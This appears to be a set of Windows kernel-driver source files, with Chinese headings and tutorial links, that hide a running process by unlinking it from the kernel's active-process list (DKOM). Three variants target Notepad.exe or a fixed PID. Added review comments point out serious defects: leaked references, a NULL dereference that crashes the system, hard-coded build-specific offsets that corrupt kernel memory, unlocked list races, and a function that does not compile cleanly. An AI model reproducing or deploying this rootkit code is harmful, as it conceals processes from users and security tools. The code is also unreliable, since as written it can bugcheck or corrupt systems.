断链隐藏进程写法一

#include <ntifs.h>



// Hand-written prototype for a kernel export that ntifs.h does not declare.
// NOTE(review): because the declaration is not taken from a public header, the
// return type and the lifetime of the returned string are unverified here.
NTKERNELAPI CHAR* PsGetProcessImageFileName(PEPROCESS Process);
// Look up a process by image name: tries candidate PIDs (100 .. 9996, step 4)
// with PsLookupProcessByProcessId and compares the image name case-insensitively.
// Returns the first matching PEPROCESS, or NULL when `name` is NULL or nothing matches.
//
// Review notes (defects, left as-is):
//  - PsLookupProcessByProcessId hands back a referenced object. Non-matching
//    processes are never passed to ObDereferenceObject, and the match is returned
//    still referenced with no documented hand-off, so every call leaks references
//    and keeps those EPROCESS objects alive for the lifetime of the system.
//  - `pn` is not checked for NULL before _stricmp.
//  - The PID range is an arbitrary guess; PIDs above 9996 are never examined.
//  - NOTE(review): the string returned by PsGetProcessImageFileName is believed to
//    be a short, truncated image name, so longer names may never match - confirm.
PEPROCESS GetProcessObjectByName(char* name)
{
if (!name)return NULL;
SIZE_T temp;
// Step of 4, presumably because PIDs are allocated in multiples of 4; start at 100 is arbitrary.
for (temp = 100; temp < 10000; temp += 4)
{
NTSTATUS status;
PEPROCESS ep;
status = PsLookupProcessByProcessId((HANDLE)temp, &ep);
if (NT_SUCCESS(status))
{
char* pn = PsGetProcessImageFileName(ep);
// Reference on `ep` is dropped on the floor in both branches (see note above).
if (_stricmp(pn, name) == 0)
return ep;
}
}
return NULL;
}

// Unlink a LIST_ENTRY from its doubly-linked list (intended: an EPROCESS's
// ActiveProcessLinks entry) and make it point to itself, so walkers of that
// list no longer see the owning process. No-op for NULL or an entry that is
// already self-linked / not consistently linked.
//
// Review notes:
//  - KeRaiseIrqlToDpcLevel only stops preemption on the current CPU. It does not
//    exclude other processors or the kernel's own writers of this list, and no
//    list lock is taken here, so a concurrent insert/remove can corrupt the list
//    and bugcheck the machine.
//  - The consistency check only guards against an already-detached entry; it
//    cannot verify that `ListEntry` really is an ActiveProcessLinks entry.
//  - Detection note: this is plain DKOM. Only this one list is altered and the
//    EPROCESS object itself is left intact, so NOTE(review) any enumeration that
//    does not walk this list (e.g. lookup by PID) is expected to still see the
//    process; comparing such views is the usual way this is detected.
VOID HidePProcessByList(PLIST_ENTRY ListEntry)
{
if (!ListEntry)return;
KIRQL OldIrql;
OldIrql = KeRaiseIrqlToDpcLevel();
// Require a sane, still-linked entry before touching the neighbours.
if (ListEntry->Flink != ListEntry && ListEntry->Blink != ListEntry && ListEntry->Blink->Flink == ListEntry && ListEntry->Flink->Blink == ListEntry)
{
ListEntry->Flink->Blink = ListEntry->Blink;
ListEntry->Blink->Flink = ListEntry->Flink;
// Self-link so that a repeated call (or a later RemoveEntryList) does not
// write into the former neighbours again.
ListEntry->Flink = ListEntry;
ListEntry->Blink = ListEntry;
}
KeLowerIrql(OldIrql);
}
// Hard-coded byte offset of ActiveProcessLinks inside EPROCESS. EPROCESS is an
// opaque, build-specific structure; this value is only valid for the one kernel
// build it was taken from. On any other build the code below reads and writes
// some unrelated field of the process object and corrupts kernel memory.
#define PROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448
// Hide the process with the given image name by unlinking its ActiveProcessLinks
// entry (EPROCESS + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET). Returns nothing and
// reports nothing: a name with no match is silent.
//
// Review note (defect, left as-is): the NULL result of GetProcessObjectByName is
// not checked. When no process matches, (ULONG64)NULL + 0x448 is passed to
// HidePProcessByList, which dereferences it -> kernel-mode page fault / bugcheck.
void HideProcess(char* name)
{
if (!name)return;
PEPROCESS PRoc = NULL;
PRoc = GetProcessObjectByName(name);

// Unlink the entry from the list to hide the process. (The original comment
// named C32Asm.exe; the only caller in this file passes a different name.)
HidePProcessByList((PLIST_ENTRY)((ULONG64)PRoc + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));

}

// Unload routine: only logs (the message reads "driver unloaded"). Nothing is
// re-linked here, so a process hidden by HideProcess stays unlinked after the
// driver is gone, and the references leaked by GetProcessObjectByName are never
// released. `pDriverObj` is unused.
static VOID UnDriver(PDRIVER_OBJECT pDriverObj)
{
DbgPrint("[-] 驱动卸载 \n");
}

// Driver entry point: logs, hides the process named "Notepad.exe" at load time
// and registers the unload routine. The target name is fixed at compile time,
// HideProcess reports no failure, and `RegistryPath` is unused; the routine
// always returns STATUS_SUCCESS.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver, PUNICODE_STRING RegistryPath)
{
DbgPrint("Hello \n");

HideProcess("Notepad.exe");
Driver->DriverUnload = UnDriver;
return STATUS_SUCCESS;
}

断链隐藏进程写法二三

#include <ntifs.h>

// Log macro. Both branches of the DBG guard expand to the same DbgPrintEx call,
// so the guard has no effect: logging is never compiled out and every message is
// emitted with the "qi:" prefix in all builds.
#ifdef DBG
#define Log(x, ...) DbgPrintEx(0, 0, "qi:" x, __VA_ARGS__)
#else
#define Log(x, ...) DbgPrintEx(0, 0, "qi:" x, __VA_ARGS__)
#endif

// Two variants of the same unlink-from-ActiveProcessLinks technique; see the
// definitions below. HideProcessB is declared void but its body contains a
// `return STATUS_UNSUCCESSFUL;` (see its review note).
NTSTATUS HideProcessA(ULONG ulPid);
void HideProcessB(unsigned long PID);


// Unload routine: only logs. Nothing that HideProcessA/HideProcessB unlinked is
// re-linked on unload. `pDriverOBject` is unused.
VOID DriverUnload(PDRIVER_OBJECT pDriverOBject)
{
Log("Driver Unload Success!");

}

// Driver entry point: unlinks the process whose PID is the hard-coded 0x4c0 via
// HideProcessA (the HideProcessB variant is commented out), registers the unload
// routine and logs. The return value of HideProcessA is ignored, and because the
// PID is fixed at compile time the effect lands on whatever process happens to
// hold that PID when the driver loads. `pRegPath` is unused.
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
HideProcessA(0x4c0);
//HideProcessB(0x4c0);
pDriverObject->DriverUnload = DriverUnload;
Log("Driver Load Success!");

return STATUS_SUCCESS;
}

// Hide a process by unlinking it from the active-process list.
//https://www.bilibili.com/video/BV16K4y1U7e4/?spm_id_from=333.337.search-card.all.click&vd_source=5777815674b3f4e5c227299a8de61c9b
//
// Walks the list starting from the current process (PsGetCurrentProcess, i.e.
// the process DriverEntry runs in), reads each node's owning EPROCESS at
// node - 0x448 and the value at EPROCESS + 0x440 as its PID, and unlinks every
// node whose PID equals `ulPid`. Returns STATUS_UNSUCCESSFUL only for PID 0;
// otherwise STATUS_SUCCESS, even when no process matched.
//
// Review notes (defects, left as-is):
//  - 0x448 and 0x440 are build-specific EPROCESS offsets; on any other kernel
//    build this reads and writes unrelated fields and corrupts kernel memory.
//  - The loop begins at the node after the current process and stops when the
//    next node would be that start node again, so the current process's own
//    entry is never examined.
//  - No lock and no IRQL change: the walk and the unlink race with the kernel's
//    own updates of this list.
//  - The unlinked node's own Flink/Blink are left pointing at its former
//    neighbours (it is not self-linked), so removing it a second time would
//    write into those neighbours again.
//  - Only a ULONG is read at +0x440; NOTE(review) confirm the field width, since
//    a wider field would be silently truncated before the compare.
NTSTATUS HideProcessA(ULONG ulPid)
{
if (ulPid == 0)return STATUS_UNSUCCESSFUL;
DWORD_PTR pEprocess = NULL;
ULONG ulProcessID = 0;
pEprocess = (DWORD_PTR)PsGetCurrentProcess();
PLIST_ENTRY pActiveProcessLinks = (LIST_ENTRY*)(pEprocess + 0x448);
PLIST_ENTRY pNextLinks = pActiveProcessLinks->Flink;
// Terminates one node short of a full circle (the starting process is skipped).
while (pNextLinks->Flink != pActiveProcessLinks->Flink)
{
pEprocess = ((DWORD_PTR)pNextLinks - 0x448);
ulProcessID = *((ULONG*)(pEprocess + 0x440));
if (ulProcessID == ulPid)
{
// Neighbours are rewired; pNextLinks itself is left untouched.
pNextLinks->Blink->Flink = pNextLinks->Flink;
pNextLinks->Flink->Blink = pNextLinks->Blink;
}
pNextLinks = pNextLinks->Flink;
}
return STATUS_SUCCESS;

}

// [Kernel process traversal/hiding, part 20] A driver implementing simple process hiding via process traversal.
//https://www.bilibili.com/video/BV15o4y1N7xv/?spm_id_from=333.337.search-card.all.click&vd_source=5777815674b3f4e5c227299a8de61c9b
//
// Hide a process by PID: look up its EPROCESS, treat EPROCESS + 0x448 as its
// ActiveProcessLinks entry and remove it with RemoveEntryList. Silent when the
// lookup fails.
//
// Review notes (defects, left as-is):
//  - `return STATUS_UNSUCCESSFUL;` in a void function is a constraint violation;
//    the function does not compile cleanly as written and the prototype above
//    does not match the intent of returning a status.
//  - 0x448 is a build-specific EPROCESS offset; on another kernel build this
//    unlinks some unrelated field and corrupts kernel memory.
//  - RemoveEntryList is a bare unlink with no locking, and it leaves the removed
//    entry's Flink/Blink pointing at the old neighbours, so the entry must never
//    be removed again.
//  - ObDereferenceObject does balance the lookup reference here.
void HideProcessB(unsigned long PID)
{
if (PID == 0)return STATUS_UNSUCCESSFUL;
PEPROCESS process;
NTSTATUS status = PsLookupProcessByProcessId((HANDLE)PID, &process);
if (!NT_SUCCESS(status))
return;
LIST_ENTRY* entry = (LIST_ENTRY*)((LONG_PTR)process + 0x448);
RemoveEntryList(entry);
ObDereferenceObject(process);
}